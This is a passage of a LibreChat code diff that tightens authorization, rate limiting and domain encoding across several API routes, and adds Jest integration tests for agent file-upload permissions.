Send sync event with resume state for ALL reconnecting clients - // This supports multi-tab scenarios where each tab needs run step data - if (isResume) { - const resumeState = await GenerationJobManager.getResumeState(streamId); - if (resumeState && !res.writableEnded) { - // Send sync event with run steps AND aggregatedContent - // Client will use aggregatedContent to initialize message state - res.write(`event: message\ndata: ${JSON.stringify({ sync: true, resumeState })}\n\n`); + const writeEvent = (event) => { + if (!res.writableEnded) { + res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); if (typeof res.flush === 'function') { res.flush(); } - logger.debug( - `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps`, - ); } - } + }; - const result = await GenerationJobManager.subscribe( - streamId, - (event) => { - if (!res.writableEnded) { - res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); + const onDone = (event) => { + writeEvent(event); + res.end(); + }; + + const onError = (error) => { + if (!res.writableEnded) { + res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`); + if (typeof res.flush === 'function') { + res.flush(); + } + res.end(); + } + }; + + let result; + + if (isResume) { + const { subscription, resumeState, pendingEvents } = + await GenerationJobManager.subscribeWithResume(streamId, writeEvent, onDone, onError); + + if (!res.writableEnded) { + if (resumeState) { + res.write( + `event: message\ndata: ${JSON.stringify({ sync: true, resumeState, pendingEvents })}\n\n`, + ); if (typeof res.flush === 'function') { res.flush(); } - } - }, - (event) => { - if (!res.writableEnded) { - res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); - if (typeof res.flush === 'function') { - res.flush(); + GenerationJobManager.markSyncSent(streamId); + logger.debug( + `[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps, ${pendingEvents.length} pending events`, + ); + } else if (pendingEvents.length > 0) { + for (const event of pendingEvents) { + writeEvent(event); } - res.end(); + logger.warn( + `[AgentStream] Resume state null for ${streamId}, replayed ${pendingEvents.length} gap events directly`, + ); } - }, - (error) => { - if (!res.writableEnded) { - res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`); - if (typeof res.flush === 'function') { - res.flush(); - } - res.end(); - } - }, - ); + } + + result = subscription; + } else { + result = await GenerationJobManager.subscribe(streamId, writeEvent, onDone, onError); + } if (!result) { return res.status(404).json({ error: 'Failed to subscribe to stream' }); diff --git a/api/server/routes/assistants/actions.js b/api/server/routes/assistants/actions.js index 57975d32a7..75ab879e2b 100644 --- a/api/server/routes/assistants/actions.js +++ b/api/server/routes/assistants/actions.js @@ -3,7 +3,11 @@ const { nanoid } = require('nanoid'); const { logger } = require('@librechat/data-schemas'); const { isActionDomainAllowed } = require('@librechat/api'); const { actionDelimiter, EModelEndpoint, removeNullishValues } = require('librechat-data-provider'); -const { encryptMetadata, domainParser } = require('~/server/services/ActionService'); +const { + legacyDomainEncode, + encryptMetadata, + domainParser, +} = require('~/server/services/ActionService'); const { getOpenAIClient } = require('~/server/controllers/assistants/helpers'); const { updateAction, getActions, deleteAction } = require('~/models/Action'); const { updateAssistantDoc, getAssistant } = require('~/models/Assistant'); @@ -39,13 +43,14 @@ router.post('/:assistant_id', async (req, res) => { return res.status(400).json({ message: 'Domain not allowed' }); } - let { domain } = metadata; - domain = await domainParser(domain, true); + const encodedDomain = await domainParser(metadata.domain, true); - if (!domain) { + if (!encodedDomain) { return res.status(400).json({ message: 'No domain provided' }); } + const legacyDomain = legacyDomainEncode(metadata.domain); + const action_id = _action_id ?? nanoid(); const initialPromises = []; @@ -60,6 +65,9 @@ router.post('/:assistant_id', async (req, res) => { if (actions_result && actions_result.length) { const action = actions_result[0]; + if (action.assistant_id !== assistant_id) { + return res.status(403).json({ message: 'Action does not belong to this assistant' }); + } metadata = { ...action.metadata, ...metadata }; } @@ -78,25 +86,29 @@ router.post('/:assistant_id', async (req, res) => { actions.push(action); } - actions.push(`${domain}${actionDelimiter}${action_id}`); + actions.push(`${encodedDomain}${actionDelimiter}${action_id}`); /** @type {{ tools: FunctionTool[] | { type: 'code_interpreter'|'retrieval'}[]}} */ const { tools: _tools = [] } = assistant; + const shouldRemoveAssistantTool = (tool) => { + if (!tool.function) { + return false; + } + const name = tool.function.name; + return ( + name.includes(encodedDomain) || name.includes(legacyDomain) || name.includes(action_id) + ); + }; + const tools = _tools - .filter( - (tool) => - !( - tool.function && - (tool.function.name.includes(domain) || tool.function.name.includes(action_id)) - ), - ) + .filter((tool) => !shouldRemoveAssistantTool(tool)) .concat( functions.map((tool) => ({ ...tool, function: { ...tool.function, - name: `${tool.function.name}${actionDelimiter}${domain}`, + name: `${tool.function.name}${actionDelimiter}${encodedDomain}`, }, })), ); @@ -117,7 +129,7 @@ router.post('/:assistant_id', async (req, res) => { // For new actions, use the assistant owner's user ID actionUpdateData.user = assistant_user || req.user.id; } - promises.push(updateAction({ action_id }, actionUpdateData)); + promises.push(updateAction({ action_id, assistant_id }, actionUpdateData)); /** @type {[AssistantDocument, Action]} */ let [assistantDocument, updatedAction] = await Promise.all(promises); @@ -168,23 +180,25 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => { const { actions = [] } = assistant_data ?? {}; const { tools = [] } = assistant ?? {}; - let domain = ''; + let storedDomain = ''; const updatedActions = actions.filter((action) => { if (action.includes(action_id)) { - [domain] = action.split(actionDelimiter); + [storedDomain] = action.split(actionDelimiter); return false; } return true; }); - domain = await domainParser(domain, true); - - if (!domain) { + if (!storedDomain) { return res.status(400).json({ message: 'No domain provided' }); } const updatedTools = tools.filter( - (tool) => !(tool.function && tool.function.name.includes(domain)), + (tool) => + !( + tool.function && + (tool.function.name.includes(storedDomain) || tool.function.name.includes(action_id)) + ), ); await openai.beta.assistants.update(assistant_id, { tools: updatedTools }); @@ -196,9 +210,15 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => { assistantUpdateData.user = req.user.id; } promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData)); - promises.push(deleteAction({ action_id })); + promises.push(deleteAction({ action_id, assistant_id })); - await Promise.all(promises); + const [, deletedAction] = await Promise.all(promises); + if (!deletedAction) { + logger.warn('[Assistant Action Delete] No matching action document found', { + action_id, + assistant_id, + }); + } res.status(200).json({ message: 'Action deleted successfully' }); } catch (error) { const message = 'Trouble deleting the Assistant Action'; diff --git a/api/server/routes/auth.js b/api/server/routes/auth.js index e84442f65f..d55684f3de 100644 --- a/api/server/routes/auth.js +++ b/api/server/routes/auth.js @@ -63,7 +63,7 @@ router.post( resetPasswordController, ); -router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA); +router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA); router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA); router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken); router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA); diff --git a/api/server/routes/convos.js b/api/server/routes/convos.js index bb9c4ebea9..578796170a 100644 --- a/api/server/routes/convos.js +++ b/api/server/routes/convos.js @@ -1,7 +1,7 @@ const multer = require('multer'); const express = require('express'); const { sleep } = require('@librechat/agents'); -const { isEnabled } = require('@librechat/api'); +const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api'); const { logger } = require('@librechat/data-schemas'); const { CacheKeys, EModelEndpoint } = require('librechat-data-provider'); const { @@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => { }); const { importIpLimiter, importUserLimiter } = createImportLimiters(); +/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */ const { forkIpLimiter, forkUserLimiter } = createForkLimiters(); -const upload = multer({ storage: storage, fileFilter: importFileFilter }); +const importMaxFileSize = resolveImportMaxFileSize(); +const upload = multer({ + storage, + fileFilter: importFileFilter, + limits: { fileSize: importMaxFileSize }, +}); +const uploadSingle = upload.single('file'); + +function handleUpload(req, res, next) { + uploadSingle(req, res, (err) => { + if (err && err.code === 'LIMIT_FILE_SIZE') { + return res.status(413).json({ message: 'File exceeds the maximum allowed size' }); + } + if (err) { + return next(err); + } + next(); + }); +} /** * Imports a conversation from a JSON file and saves it to the database. @@ -238,7 +257,7 @@ router.post( importIpLimiter, importUserLimiter, configMiddleware, - upload.single('file'), + handleUpload, async (req, res) => { try { /* TODO: optimize to return imported conversations and add manually */ @@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => { } }); -router.post('/duplicate', async (req, res) => { +router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => { const { conversationId, title } = req.body; try { diff --git a/api/server/routes/files/files.js b/api/server/routes/files/files.js index 5de2ddb379..9290d1a7ed 100644 --- a/api/server/routes/files/files.js +++ b/api/server/routes/files/files.js @@ -2,12 +2,12 @@ const fs = require('fs').promises; const express = require('express'); const { EnvVar } = require('@librechat/agents'); const { logger } = require('@librechat/data-schemas'); +const { verifyAgentUploadPermission } = require('@librechat/api'); const { Time, isUUID, CacheKeys, FileSources, - SystemRoles, ResourceType, EModelEndpoint, PermissionBits, @@ -381,48 +381,15 @@ router.post('/', async (req, res) => { return await processFileUpload({ req, res, metadata }); } - /** - * Check agent permissions for permanent agent file uploads (not message attachments). - * Message attachments (message_file=true) are temporary files for a single conversation - * and should be allowed for users who can chat with the agent. - * Permanent file uploads to tool_resources require EDIT permission. - */ - const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true'; - if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) { - const userId = req.user.id; - - /** Admin users bypass permission checks */ - if (req.user.role !== SystemRoles.ADMIN) { - const agent = await getAgent({ id: metadata.agent_id }); - - if (!agent) { - return res.status(404).json({ - error: 'Not Found', - message: 'Agent not found', - }); - } - - /** Check if user is the author or has edit permission */ - if (agent.author.toString() !== userId) { - const hasEditPermission = await checkPermission({ - userId, - role: req.user.role, - resourceType: ResourceType.AGENT, - resourceId: agent._id, - requiredPermission: PermissionBits.EDIT, - }); - - if (!hasEditPermission) { - logger.warn( - `[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`, - ); - return res.status(403).json({ - error: 'Forbidden', - message: 'Insufficient permissions to upload files to this agent', - }); - } - } - } + const denied = await verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, + }); + if (denied) { + return; } return await processAgentFileUpload({ req, res, metadata }); diff --git a/api/server/routes/files/images.agents.test.js b/api/server/routes/files/images.agents.test.js new file mode 100644 index 0000000000..862ab87d63 --- /dev/null +++ b/api/server/routes/files/images.agents.test.js @@ -0,0 +1,376 @@ +const express = require('express'); +const request = require('supertest'); +const mongoose = require('mongoose'); +const { v4: uuidv4 } = require('uuid'); +const { createMethods } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { + SystemRoles, + AccessRoleIds, + ResourceType, + PrincipalType, +} = require('librechat-data-provider'); +const { createAgent } = require('~/models/Agent'); + +jest.mock('~/server/services/Files/process', () => ({ + processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => { + return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' }); + }), + processImageFile: jest.fn().mockImplementation(async ({ res }) => { + return res.status(200).json({ message: 'Image processed' }); + }), + filterFile: jest.fn(), +})); + +jest.mock('fs', () => { + const actualFs = jest.requireActual('fs'); + return { + ...actualFs, + promises: { + ...actualFs.promises, + unlink: jest.fn().mockResolvedValue(undefined), + }, + }; +}); + +const fs = require('fs'); +const { processAgentFileUpload } = require('~/server/services/Files/process'); + +const router = require('~/server/routes/files/images'); + +describe('POST /images - Agent Upload Permission Check (Integration)', () => { + let mongoServer; + let authorId; + let otherUserId; + let agentCustomId; + let User; + let Agent; + let AclEntry; + let methods; + let modelsToCleanup = []; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + await mongoose.connect(mongoUri); + + const { createModels } = require('@librechat/data-schemas'); + const models = createModels(mongoose); + modelsToCleanup = Object.keys(models); + Object.assign(mongoose.models, models); + methods = createMethods(mongoose); + + User = models.User; + Agent = models.Agent; + AclEntry = models.AclEntry; + + await methods.seedDefaultRoles(); + }); + + afterAll(async () => { + const collections = mongoose.connection.collections; + for (const key in collections) { + await collections[key].deleteMany({}); + } + for (const modelName of modelsToCleanup) { + if (mongoose.models[modelName]) { + delete mongoose.models[modelName]; + } + } + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Agent.deleteMany({}); + await User.deleteMany({}); + await AclEntry.deleteMany({}); + + authorId = new mongoose.Types.ObjectId(); + otherUserId = new mongoose.Types.ObjectId(); + agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`; + + await User.create({ _id: authorId, username: 'author', email: 'author@test.com' }); + await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' }); + + jest.clearAllMocks(); + }); + + const createAppWithUser = (userId, userRole = SystemRoles.USER) => { + const app = express(); + app.use(express.json()); + app.use((req, _res, next) => { + if (req.method === 'POST') { + req.file = { + originalname: 'test.png', + mimetype: 'image/png', + size: 100, + path: '/tmp/t.png', + filename: 'test.png', + }; + req.file_id = uuidv4(); + } + next(); + }); + app.use((req, _res, next) => { + req.user = { id: userId.toString(), role: userRole }; + req.app = { locals: {} }; + req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } }; + next(); + }); + app.use('/images', router); + return app; + }; + + it('should return 403 when user has no permission on agent', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should allow upload for agent owner', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(authorId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow upload for admin regardless of ownership', async () => { + await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const app = createAppWithUser(otherUserId, SystemRoles.ADMIN); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow upload for user with EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_EDITOR, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should deny upload for user with only VIEW permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => { + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + }); + + it('should return 404 for non-existent agent', async () => { + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: 'agent_nonexistent123456789', + tool_resource: 'context', + file_id: uuidv4(), + }); + + expect(response.status).toBe(404); + expect(response.body.error).toBe('Not Found'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); + + it('should allow message_file attachment (boolean true) without EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + message_file: true, + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should allow message_file attachment (string "true") without EDIT permission', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + message_file: 'true', + file_id: uuidv4(), + }); + + expect(response.status).toBe(200); + expect(processAgentFileUpload).toHaveBeenCalled(); + }); + + it('should deny upload when message_file is false (not a message attachment)', async () => { + const agent = await createAgent({ + id: agentCustomId, + name: 'Test Agent', + provider: 'openai', + model: 'gpt-4', + author: authorId, + }); + + const { grantPermission } = require('~/server/services/PermissionService'); + await grantPermission({ + principalType: PrincipalType.USER, + principalId: otherUserId, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + accessRoleId: AccessRoleIds.AGENT_VIEWER, + grantedBy: authorId, + }); + + const app = createAppWithUser(otherUserId); + const response = await request(app).post('/images').send({ + endpoint: 'agents', + agent_id: agentCustomId, + tool_resource: 'context', + message_file: false, + file_id: uuidv4(), + }); + + expect(response.status).toBe(403); + expect(response.body.error).toBe('Forbidden'); + expect(processAgentFileUpload).not.toHaveBeenCalled(); + expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png'); + }); +}); diff --git a/api/server/routes/files/images.js b/api/server/routes/files/images.js index 8072612a69..185ec7a671 100644 --- a/api/server/routes/files/images.js +++ b/api/server/routes/files/images.js @@ -2,12 +2,15 @@ const path = require('path'); const fs = require('fs').promises; const express = require('express'); const { logger } = require('@librechat/data-schemas'); +const { verifyAgentUploadPermission } = require('@librechat/api'); const { isAssistantsEndpoint } = require('librechat-data-provider'); const { processAgentFileUpload, processImageFile, filterFile, } = require('~/server/services/Files/process'); +const { checkPermission } = require('~/server/services/PermissionService'); +const { getAgent } = require('~/models/Agent'); const router = express.Router(); @@ -22,6 +25,16 @@ router.post('/', async (req, res) => { metadata.file_id = req.file_id; if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) { + const denied = await verifyAgentUploadPermission({ + req, + res, + metadata, + getAgent, + checkPermission, + }); + if (denied) { + return; + } return await processAgentFileUpload({ req, res, metadata }); } diff --git a/api/server/routes/mcp.js b/api/server/routes/mcp.js index 0afac81192..57a99d199a 100644 --- a/api/server/routes/mcp.js +++ b/api/server/routes/mcp.js @@ -50,6 +50,18 @@ const router = Router(); const OAUTH_CSRF_COOKIE_PATH = '/api/mcp'; +const checkMCPUsePermissions = generateCheckAccess({ + permissionType: PermissionTypes.MCP_SERVERS, + permissions: [Permissions.USE], + getRoleByName, +}); + +const checkMCPCreate = generateCheckAccess({ + permissionType: PermissionTypes.MCP_SERVERS, + permissions: [Permissions.USE, Permissions.CREATE], + getRoleByName, +}); + /** * Get all MCP tools available to the user * Returns only MCP tools, completely decoupled from regular LibreChat tools @@ -470,69 +482,75 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => { * Reinitialize MCP server * This endpoint allows reinitializing a specific MCP server */ -router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => { - try { - const { serverName } = req.params; - const user = createSafeUser(req.user); +router.post( + '/:serverName/reinitialize', + requireJwtAuth, + checkMCPUsePermissions, + setOAuthSession, + async (req, res) => { + try { + const { serverName } = req.params; + const user = createSafeUser(req.user); - if (!user.id) { - return res.status(401).json({ error: 'User not authenticated' }); - } + if (!user.id) { + return res.status(401).json({ error: 'User not authenticated' }); + } - logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`); + logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`); - const mcpManager = getMCPManager(); - const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id); - if (!serverConfig) { - return res.status(404).json({ - error: `MCP server '${serverName}' not found in configuration`, + const mcpManager = getMCPManager(); + const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id); + if (!serverConfig) { + return res.status(404).json({ + error: `MCP server '${serverName}' not found in configuration`, + }); + } + + await mcpManager.disconnectUserConnection(user.id, serverName); + logger.info( + `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`, + ); + + /** @type {Record> | undefined} */ + let userMCPAuthMap; + if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') { + userMCPAuthMap = await getUserMCPAuthMap({ + userId: user.id, + servers: [serverName], + findPluginAuthsByKeys, + }); + } + + const result = await reinitMCPServer({ + user, + serverName, + userMCPAuthMap, }); - } - await mcpManager.disconnectUserConnection(user.id, serverName); - logger.info( - `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`, - ); + if (!result) { + return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' }); + } - /** @type {Record> | undefined} */ - let userMCPAuthMap; - if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') { - userMCPAuthMap = await getUserMCPAuthMap({ - userId: user.id, - servers: [serverName], - findPluginAuthsByKeys, + const { success, message, oauthRequired, oauthUrl } = result; + + if (oauthRequired) { + const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName); + setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH); + } + + res.json({ + success, + message, + oauthUrl, + serverName, + oauthRequired, }); + } catch (error) { + logger.error('[MCP Reinitialize] Unexpected error', error); + res.status(500).json({ error: 'Internal server error' }); } - - const result = await reinitMCPServer({ - user, - serverName, - userMCPAuthMap, - }); - - if (!result) { - return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' }); - } - - const { success, message, oauthRequired, oauthUrl } = result; - - if (oauthRequired) { - const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName); - setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH); - } - - res.json({ - success, - message, - oauthUrl, - serverName, - oauthRequired, - }); - } catch (error) { - logger.error('[MCP Reinitialize] Unexpected error', error); - res.status(500).json({ error: 'Internal server error' }); - } -}); + }, +); /** * Get connection status for all MCP servers @@ -639,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) => * Check which authentication values exist for a specific MCP server * This endpoint returns only boolean flags indicating if values are set, not the actual values */ -router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => { +router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => { try { const { serverName } = req.params; const user = req.user; @@ -696,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) { MCP Server CRUD Routes (User-Managed MCP Servers) */ -// Permission checkers for MCP server management -const checkMCPUsePermissions = generateCheckAccess({ - permissionType: PermissionTypes.MCP_SERVERS, - permissions: [Permissions.USE], - getRoleByName, -}); - -const checkMCPCreate = generateCheckAccess({ - permissionType: PermissionTypes.MCP_SERVERS, - permissions: [Permissions.USE, Permissions.CREATE], - getRoleByName, -}); - /** * Get list of accessible MCP servers * @route GET /api/mcp/servers diff --git a/api/server/routes/messages.js b/api/server/routes/messages.js index c208e9c406..03286bc7f1 100644 --- a/api/server/routes/messages.js +++ b/api/server/routes/messages.js @@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => { try { - const { messageId } = req.params; - await deleteMessages({ messageId }); + const { conversationId, messageId } = req.params; + await deleteMessages({ messageId, conversationId, user: req.user.id }); res.status(204).send(); } catch (error) { logger.error('Error deleting message:', error); diff --git a/api/server/services/ActionService.js b/api/server/services/ActionService.js index 5e96726a46..bde052bba4 100644 --- a/api/server/services/ActionService.js +++ b/api/server/services/ActionService.js @@ -28,6 +28,7 @@ const { getLogStores } = require('~/cache'); const JWT_SECRET = process.env.JWT_SECRET; const toolNameRegex = /^[a-zA-Z0-9_-]+$/; +const protocolRegex = /^https?:\/\//; const replaceSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); /** @@ -48,7 +49,11 @@ const validateAndUpdateTool = async ({ req, tool, assistant_id }) => { actions = await getActions({ assistant_id, user: req.user.id }, true); const matchingActions = actions.filter((action) => { const metadata = action.metadata; - return metadata && metadata.domain === domain; + if (!metadata) { + return false; + } + const strippedMetaDomain = stripProtocol(metadata.domain); + return strippedMetaDomain === domain || metadata.domain === domain; }); const action = matchingActions[0]; if (!action) { @@ -66,10 +71,36 @@ const validateAndUpdateTool = async ({ req, tool, assistant_id }) => { return tool; }; +/** @param {string} domain */ +function stripProtocol(domain) { + const stripped = domain.replace(protocolRegex, ''); + const pathIdx = stripped.indexOf('/'); + return pathIdx === -1 ? stripped : stripped.substring(0, pathIdx); +} + +/** + * Encodes a domain using the legacy scheme (full URL including protocol). + * Used for backward-compatible matching against agents saved before the collision fix. + * @param {string} domain + * @returns {string} + */ +function legacyDomainEncode(domain) { + if (!domain) { + return ''; + } + if (domain.length <= Constants.ENCODED_DOMAIN_LENGTH) { + return domain.replace(/\./g, actionDomainSeparator); + } + const modifiedDomain = Buffer.from(domain).toString('base64'); + return modifiedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH); +} + /** * Encodes or decodes a domain name to/from base64, or replacing periods with a custom separator. * * Necessary due to `[a-zA-Z0-9_-]*` Regex Validation, limited to a 64-character maximum. + * Strips protocol prefix before encoding to prevent base64 collisions + * (all `https://` URLs share the same 10-char base64 prefix). * * @param {string} domain - The domain name to encode/decode. * @param {boolean} inverse - False to decode from base64, true to encode to base64. @@ -79,23 +110,27 @@ async function domainParser(domain, inverse = false) { if (!domain) { return; } - const domainsCache = getLogStores(CacheKeys.ENCODED_DOMAINS); - const cachedDomain = await domainsCache.get(domain); - if (inverse && cachedDomain) { - return domain; - } - if (inverse && domain.length <= Constants.ENCODED_DOMAIN_LENGTH) { - return domain.replace(/\./g, actionDomainSeparator); - } + const domainsCache = getLogStores(CacheKeys.ENCODED_DOMAINS); if (inverse) { - const modifiedDomain = Buffer.from(domain).toString('base64'); + const hostname = stripProtocol(domain); + const cachedDomain = await domainsCache.get(hostname); + if (cachedDomain) { + return hostname; + } + + if (hostname.length <= Constants.ENCODED_DOMAIN_LENGTH) { + return hostname.replace(/\./g, actionDomainSeparator); + } + + const modifiedDomain = Buffer.from(hostname).toString('base64'); const key = modifiedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH); await domainsCache.set(key, modifiedDomain); return key; } + const cachedDomain = await domainsCache.get(domain); if (!cachedDomain) { return domain.replace(replaceSeparatorRegex, '.'); } @@ -456,6 +491,7 @@ const deleteAssistantActions = async ({ req, assistant_id }) => { module.exports = { deleteAssistantActions, validateAndUpdateTool, + legacyDomainEncode, createActionTool, encryptMetadata, decryptMetadata, diff --git a/api/server/services/ActionService.spec.js b/api/server/services/ActionService.spec.js index c60aef7ad1..42def44b4f 100644 --- a/api/server/services/ActionService.spec.js +++ b/api/server/services/ActionService.spec.js @@ -1,175 +1,539 @@ -const { Constants, actionDomainSeparator } = require('librechat-data-provider'); -const { domainParser } = require('./ActionService'); +const { Constants, actionDelimiter, actionDomainSeparator } = require('librechat-data-provider'); +const { domainParser, legacyDomainEncode, validateAndUpdateTool } = require('./ActionService'); jest.mock('keyv'); -const globalCache = {}; +jest.mock('~/models/Action', () => ({ + getActions: jest.fn(), + deleteActions: jest.fn(), +})); + +const { getActions } = require('~/models/Action'); + +let mockDomainCache = {}; jest.mock('~/cache/getLogStores', () => { - return jest.fn().mockImplementation(() => { - const EventEmitter = require('events'); - const { CacheKeys } = require('librechat-data-provider'); + return jest.fn().mockImplementation(() => ({ + get: async (key) => mockDomainCache[key] ?? null, + set: async (key, value) => { + mockDomainCache[key] = value; + return true; + }, + })); +}); - class KeyvMongo extends EventEmitter { - constructor(url = 'mongodb://127.0.0.1:27017', options) { - super(); - this.ttlSupport = false; - url = url ?? {}; - if (typeof url === 'string') { - url = { url }; - } - if (url.uri) { - url = { url: url.uri, ...url }; - } - this.opts = { - url, - collection: 'keyv', - ...url, - ...options, - }; - } +beforeEach(() => { + mockDomainCache = {}; + getActions.mockReset(); +}); - get = async (key) => { - return new Promise((resolve) => { - 